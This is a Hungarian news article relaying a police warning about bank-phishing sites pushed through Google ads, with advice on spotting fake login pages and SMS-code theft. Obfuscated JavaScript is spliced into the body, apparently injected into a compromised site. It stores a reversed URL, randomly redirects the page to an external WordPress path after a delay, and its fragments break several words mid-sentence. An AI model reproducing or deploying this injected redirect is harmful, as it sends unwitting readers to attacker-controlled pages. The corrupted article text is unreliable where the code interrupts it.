Kezdőlap Tech Figyeljünk az adatainkra! – Google-hirdetésekkel támadnak az internetes csalók

Figyeljünk az adatainkra! – Google-hirdetésekkel támadnak az internetes csalók

Újra több olyan adathalász-weboldal bukkant fel az interneten, amelyek célja a magyar banki ügyfelek megkárosítása. Az elkövetők egyszerű módszert alkalmaznak: lemásolják egy bank online bejelentkező felületét, majd a bank által használt weboldal címére nagyban hasonlító URL-címen elérhetővé teszik a saját hamis weboldalukat.

Az utóbbi napokban újra több olyan adathalász-weboldal bukkant fel az interneten, amelyek célja a magyar banki ügyfelek megkárosítása – hívta fel a figyelmet a rendőrség közösségi média oldalán.

Az elkövetők egyszerű módszert alkalmaznak: lemásolják egy bank online bejelentkező felületét, majd a bank által használt weboldal címére nagyban hasonlító URL-címen elérhetővé teszik a hamis weboldalukat.

$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top">

Az adathalászok módszere, hogy hirdetési szerződést kötnek a Google-al, így a bank nevének beírásakor az adathalász oldaluk jelenik meg a találatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tok között az első helyen. Mivel a legtöbb felhasználó internetezés során csak a saját bankjának a nevét írja be a böngészőbe, majd pedig a Google által adott találatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tokra kattintva navigál toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tovább, ezért így nagyon sok gyanútlan felhasználót lehet az adathalász-oldalakra csalni.

Természetesen az ilyen oldalakat mind a bankok, mind pedig a rendőrség jelenti a szolgáltatóknak, és rövid időn belül elérhetetlenné válnak, azonban ez a kevés idő is elég lehet, hogy többen áldozatul essenek. A csalók pedig folyamatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosan új oldalakat hoznak létre.

A hamis weboldalon az elkövetők a bejelentkezési adataik (felhasználónév és jelszó) megadása mellett arra is kérik az ügyfeleket, hogy a megfelelő mezőbe írják be a bejelentkezéshez szükséges, sms-ben kapott megerősítő kódot. Ezt követően belépnek az ügyfél netbankjába és tranzakciót kezdeményeznek. Mivel ez újabb megerősítő kódot igényel, így közben az adathalász oldalon is újabb felületre irányítják az áldozatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot, ahol szintén kérik az újabb kód megadását.

Ha a felhasználó nem olvassa el figyelmesen a második sms-t, sokszor fel sem tűnik neki, hogy azt már egy tranzakció megerősítése miatt küldte a bank. Amennyiben megadja a kódot, az elkövetők már könnyedén hitelesíteni tudják a tranzakciót a valódi netbankban.

Annak érdekében, hogy ne váljunk áldozatává ennek a csalási módszernek, az alábbi óvintézkedéseket tegyük meg:

  • az általunk használt netbankra ne Google kereséssel jussunk el, hanem inkább mentsük el a
  • címet könyvjelzőként;
  • amennyiben nincs elmentve a cím, úgy mindenképpen legyünk figyelmesek: a Google a találatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tok mellett mindig jelzi egy hirdetés felirattal, ha valaki fizetett azért, hogy a weboldal a találati lista első helyére kerüljön;
  • ellenőrizzük a weboldal címét: ha a cím nem kötődik a bankhoz (véletlenszerű vagy oda nem illő karaktersort látunk) vagy szokatlan szövegrészek szerepelnek benne, úgy vélhetően egy adathalász weboldalon vagyunk;
  • mindig figyelmesen olvassuk el a bank által küldött sms-eket, ne csupán a megerősítő kódra fókuszáljunk;
  • a csalók próbálkozhatnak azzal is, hogy e-mailben csalnak minket az adathalász oldalra: ilyen esetekben szintén vizsgáljuk meg a feladó e-mail-címének is a hitelességét.

Amennyiben valaki későn eszmél rá, hogy adathalász bűnözőknek adta meg a bejelentkezési adatait, úgy mielőbb hívja fel bankját a tranzakció megakadályozása érdekében.

A megvalósult tranzakciók esetén a rendőrségi feljelentés megtételével sem lehet késlekedni, ugyanis minél kevesebb idő telik az utalást követően, annál nagyobb esély van az elutalt pénz visszaszerzésére is.

A cikk folytatódik:

- Hirdetés -
MEGOSZTÁS

KAPCSOLÓDÓ CIKKEK

- Hirdetés -